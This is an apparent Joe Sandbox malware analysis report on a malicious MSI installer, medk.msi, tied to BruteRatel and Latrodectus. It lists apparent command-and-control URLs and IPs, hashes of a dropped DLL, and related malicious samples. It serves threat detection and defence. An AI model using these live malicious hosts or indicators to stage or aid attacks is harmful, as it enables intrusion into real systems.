00000006.00000002.4569718360.0000029313A30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276717033.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232426427.0000029311AC0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.00000293119F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://samomol.com:9043/pankihoy.phprundll32.exe, 00000006.00000003.3335114775.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://powerpoint.office.comEMdexplorer.exe, 00000008.00000000.2242782012.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.thawte.com/cps0/medk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drfalse
                                                                                		high
                                                                                https://rolefenik.com/test/Kexplorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000008.00000002.4590045694.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2242782012.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://burjog.com:9043/derrundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://burjog.com:9043/pankihoy.phpCryptographyQJgarundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.thawte.com/repository0Wmedk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drfalse
                                                                                    		high
                                                                                    https://outlook.comeexplorer.exe, 00000008.00000000.2242782012.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3083287941.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980843458.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4590045694.000000000C086000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000008.00000000.2238643975.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075025138.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4581549359.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2980638609.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://burjog.com:9043/neo.phpAHJrundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://rolefenik.com/test/3explorer.exe, 00000008.00000002.4590045694.000000000C354000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://www.advancedinstaller.commedk.msi, MSI8F42.tmp.2.dr, MSI8D89.tmp.2.dr, MSI8D3A.tmp.2.dr, 6d8c4f.msi.2.dr, MSI8E67.tmp.2.dr, MSI8DD8.tmp.2.dr, MSI8E17.tmp.2.drfalse
                                                                                              		high
                                                                                              https://burjog.com/rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://api.msn.com/explorer.exe, 00000008.00000002.4581549359.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2237668120.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://burjog.com:9043/neo.phpjJrundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://rolefenik.com/test/;explorer.exe, 00000008.00000002.4581549359.00000000098AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.msn.com:443/en-us/feedexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-explorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://burjog.com:9043/rundll32.exe, 00000006.00000003.2232775913.0000029311A5C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.4218743930.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A54000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311A90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2232460525.0000029311A5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4567543964.0000029311AD2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3276876840.0000029311A5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-eiexplorer.exe, 00000008.00000000.2235320287.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4577460242.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2981009634.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://rolefenik.com/est/explorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://rolefenik.com/Kexplorer.exe, 00000008.00000002.4590045694.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077667382.000000000C369000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3079194538.000000000C369000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          87.120.37.120
                                                                                                          		samomol.comBulgaria
                                                                                                          		34224NETERRA-ASBGtrue
                                                                                                          104.21.15.162
                                                                                                          		ergiholim.comUnited States
                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                          104.21.92.105
                                                                                                          		rolefenik.comUnited States
                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                          45.143.166.230
                                                                                                          		burjog.comRussian Federation
                                                                                                          		43182ITTITT-ASRUtrue

                                                                                                          General Information

                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1555319
                                                                                                          Start date and time:2024-11-13 18:19:09 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 9m 9s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:10
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:1
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Sample name:medk.msi
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.evad.winMSI@9/24@4/4
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 100%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 98%
                                                                                                          • Number of executed functions: 27
                                                                                                          • Number of non-executed functions: 192
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .msi
                                                                                                          • Override analysis time to 240s for rundll32

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • VT rate limit hit for: medk.msi

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          12:20:19API Interceptor11154522x Sleep call for process: explorer.exe modified

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          104.21.15.162yPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                            http://playtaku.onlineGet hashmaliciousUnknownBrowse
                                                                                                              104.21.92.105apptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                  yPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                    45.143.166.230Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse

                                                                                                                      Domains

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      ergiholim.comyPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      0TokOhBLe6.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 172.67.163.30
                                                                                                                      rolefenik.comlavi.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 172.67.191.232
                                                                                                                      apptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 104.21.92.105
                                                                                                                      Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 104.21.92.105
                                                                                                                      yPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 104.21.92.105
                                                                                                                      0TokOhBLe6.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 172.67.191.232

                                                                                                                      ASNs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      ITTITT-ASRUDocument-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                      • 45.143.166.83
                                                                                                                      apptext.dll.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 45.143.166.83
                                                                                                                      Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 45.143.166.83
                                                                                                                      wrgmhT3TP7.elfGet hashmaliciousMiraiBrowse
                                                                                                                      • 77.87.102.93
                                                                                                                      yPSjWvD9LD.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 45.143.166.83
                                                                                                                      0TokOhBLe6.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                      • 45.143.166.83
                                                                                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 77.87.102.99
                                                                                                                      bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                      • 45.143.166.48
                                                                                                                      p4W95cEkDd.exeGet hashmaliciousStealcBrowse
                                                                                                                      • 45.143.167.51
                                                                                                                      Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                      • 45.143.166.230
                                                                                                                      NETERRA-ASBGarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      nshppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      nshmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 31.13.248.89
                                                                                                                      CLOUDFLARENETUSDocument-v17-10-27.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://l.e.expansion.com/rts/go2.aspx?h=1472587&tp=i-1NGB-A5-b00-1YXgaC-6v-X6KL-1c-1D5I0b-lAXcqWepVc-1yosex&pi=X3ChywZXQmNE8VeceGHlfotAef21gDzbhSQg1vZMQMU&x=%64%79%6E%61%6D%69%63%69%74%64%65%76%69%63%65%73%2E%63%6F%6D%2F%6A%6F%69%6B%64%6A%6D%65%75%65%2FFUDMSvpcJrwI1XV/YW5kcmV3Lm1hbnRlY29uQGZpcnN0b250YXJpby5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.174.133
                                                                                                                      2024-2025_Open Enrollment4402462144024621.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                                      • 104.26.4.39
                                                                                                                      https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://carrier.businessappdevs.com/Baa9NGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.0.123
                                                                                                                      CLOUDFLARENETUSDocument-v17-10-27.jsGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.96.3
                                                                                                                      https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://l.e.expansion.com/rts/go2.aspx?h=1472587&tp=i-1NGB-A5-b00-1YXgaC-6v-X6KL-1c-1D5I0b-lAXcqWepVc-1yosex&pi=X3ChywZXQmNE8VeceGHlfotAef21gDzbhSQg1vZMQMU&x=%64%79%6E%61%6D%69%63%69%74%64%65%76%69%63%65%73%2E%63%6F%6D%2F%6A%6F%69%6B%64%6A%6D%65%75%65%2FFUDMSvpcJrwI1XV/YW5kcmV3Lm1hbnRlY29uQGZpcnN0b250YXJpby5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 172.67.174.133
                                                                                                                      2024-2025_Open Enrollment4402462144024621.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 188.114.97.3
                                                                                                                      Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                                      • 104.26.4.39
                                                                                                                      https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://carrier.businessappdevs.com/Baa9NGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.0.123

                                                                                                                      JA3 Fingerprints

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      ASmartService.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105
                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      • 104.21.15.162
                                                                                                                      • 104.21.92.105

                                                                                                                      Dropped Files

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      C:\Windows\Installer\MSI8D3A.tmplavi.msiGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                        Document-v09-42-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                          Document-v05-53-20.jsGet hashmaliciousBruteRatel, LatrodectusBrowse
                                                                                                                            FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                                                                                                              Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                Document-19-06-38.jsGet hashmaliciousBruteRatelBrowse
                                                                                                                                  Document-14-33-26.jsGet hashmaliciousUnknownBrowse
                                                                                                                                    net.msiGet hashmaliciousUnknownBrowse
                                                                                                                                      Document-14-33-26.jsGet hashmaliciousUnknownBrowse
                                                                                                                                        1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msiGet hashmaliciousUnknownBrowse

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Config.Msi\6d8c51.rbs

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):1191
                                                                                                                                          Entropy (8bit):5.695308844822562
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:ZZlOgozVZ6I/XktlRpUjjFPLQOEDhiSOyRLK:ZanuI/SbmPGD8SOR
                                                                                                                                          MD5:C71429BA343457D00A705AB2792D1F93
                                                                                                                                          SHA1:DFD185E3328B9D382E2A24BE8D51B59B64D1A952
                                                                                                                                          SHA-256:227CF8DB2181B88B233CDE823E863D7EFE7437C242FD6895E0B5583F7CAD9567
                                                                                                                                          SHA-512:607A3B1E29F924D1FA4792CB83CD38300FEE8B0CDA3196B468753B8737D78DBB34E5F670EA9C71A337AC0D9FC023B1A4E59A192DAC987311F64C7C0438CCC9BD
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:...@IXOS.@.....@.bmY.@.....@.....@.....@.....@.....@......&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}..MiddleTown..medk.msi.@.....@C....@.....@........&.{B4021E8B-3405-4502-A951-957A46D23C96}.....@.....@.....@.....@.......@.....@.....@.......@......MiddleTown......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}.@......&.{C38A4B2A-9F83-4A9D-8505-10020DD6ABA7}&.{5AB6B0C5-5CD6-4CF7-ABF4-4E467A0D78CE}.@........CreateFolders..Creating folders..Folder: [1]#.6.C:\Users\user\AppData\Roaming\MSER LTD\MiddleTown\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..".C:\Users\user\AppData\Roaming\....).C:\Users\user\AppData\Roaming\tab.dll....WriteRegistryValues..Writing system registry values..Key: [1]

                                                                                                                                          C:\Users\user\AppData\Roaming\tab.dll

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1692160
                                                                                                                                          Entropy (8bit):6.810501247617741
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:87u7nB/DBD9accSqVO9y/QaD74F3Zux5UDJpbD52hCvrHbvLz:8y/DBD9MVO9yos0F345UTbDukHvL
                                                                                                                                          MD5:4F4A164B5F9EF20BE601531A727179A2
                                                                                                                                          SHA1:1601622DC7CAEF28CE413E1D73B4D4596AABFC50
                                                                                                                                          SHA-256:0F23855E56EB6EC760717BE43280EEEEAEC1AEEF939F9AE6A41DAF1B8E3BD306
                                                                                                                                          SHA-512:DE09D9F0048A19C7EFA7FFAE01F58C41E619E09E6EC56E4B818B58846672A0772C58913BA5AD4C86B746D91399894A21BF51225C1737A0652B1C85FFA3307030
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..5w..fw..fw..f<..g...fgw.gg..fgw.g}..f<..gp..f<..go..f<..gb..fw..f9..fgw.g...fw..fQ..f?v.g$..f?v.gv..f?v.fv..fw.qfu..f?v.gv..fRichw..f................PE..d.....g..........# ...).............`.......................................@............ A........................................`a..p....a...........^......0.......pS... ......P...p.......................(.......@............................................text...|........................... ..`.rdata...x.......z..................@..@.data...........L...h..............@....pdata..0...........................@..@.rsrc....^.......`...Z..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................

                                                                                                                                          C:\Windows\Installer\6d8c4f.msi

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {B4021E8B-3405-4502-A951-957A46D23C96}, Number of Words: 10, Subject: MiddleTown, Author: MSER LTD, Name of Creating Application: MiddleTown, Template: ;1033, Comments: This installer database contains the logic and data required to install MiddleTown., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2131456
                                                                                                                                          Entropy (8bit):7.438035416775101
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:F943YhW8zBQSc0ZnSKBZKumZr7Apj3Y+7jHplNa:6YY0Zn3K/Al3dXHpra
